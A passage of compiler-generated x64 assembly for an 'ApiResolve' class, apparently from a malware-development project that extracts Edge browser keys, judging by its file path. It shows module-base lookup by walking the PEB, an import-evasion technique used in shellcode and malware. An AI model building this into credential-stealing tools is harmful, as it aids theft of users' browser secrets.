	mov	rcx, QWORD PTR pDllName$2[rsp]
	call	?CopyStringW@@YA_NPEB_WPEA_W_K@Z	; CopyStringW
; Line 39
	lea	rcx, QWORD PTR wsModuleName$5[rsp]
	call	?LowerStringW@@YA_NPEA_W@Z		; LowerStringW
; Line 40
	mov	rcx, QWORD PTR lpwsModuleName$[rsp]
	call	?LowerStringW@@YA_NPEA_W@Z		; LowerStringW
	npad	1
; Line 42
	mov	rdx, QWORD PTR lpwsModuleName$[rsp]
	lea	rcx, QWORD PTR wsModuleName$5[rsp]
	call	?CompareStringW@@YA_NPEB_W0@Z		; CompareStringW
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN8@GetModuleB
; Line 43
	jmp	$LN10@GetModuleB
$LN8@GetModuleB:
; Line 46
	mov	rax, QWORD PTR pEntry$4[rsp]
	mov	rax, QWORD PTR [rax+48]
	jmp	SHORT $LN1@GetModuleB
; Line 47
	jmp	$LN2@GetModuleB
$LN3@GetModuleB:
; Line 49
	xor	eax, eax
$LN1@GetModuleB:
; Line 50
	add	rsp, 616				; 00000268H
	ret	0
?GetModuleBaseAddress@ApiResolve@@QEAAPEAXQEA_W@Z ENDP	; ApiResolve::GetModuleBaseAddress
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
this$ = 8
??1ApiResolve@@QEAA@XZ PROC				; ApiResolve::~ApiResolve
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\ApiResolve.cpp
; Line 13
	mov	QWORD PTR [rsp+8], rcx
	ret	0
??1ApiResolve@@QEAA@XZ ENDP				; ApiResolve::~ApiResolve
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
this$ = 8
??0ApiResolve@@QEAA@XZ PROC				; ApiResolve::ApiResolve
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\ApiResolve.cpp
; Line 5
	mov	QWORD PTR [rsp+8], rcx
; Line 7
	mov	rax, QWORD PTR gs:[96]
	mov	rcx, QWORD PTR this$[rsp]
	mov	QWORD PTR [rcx], rax
; Line 11
	mov	rax, QWORD PTR this$[rsp]
	ret	0
??0ApiResolve@@QEAA@XZ ENDP				; ApiResolve::ApiResolve
_TEXT	ENDS
END
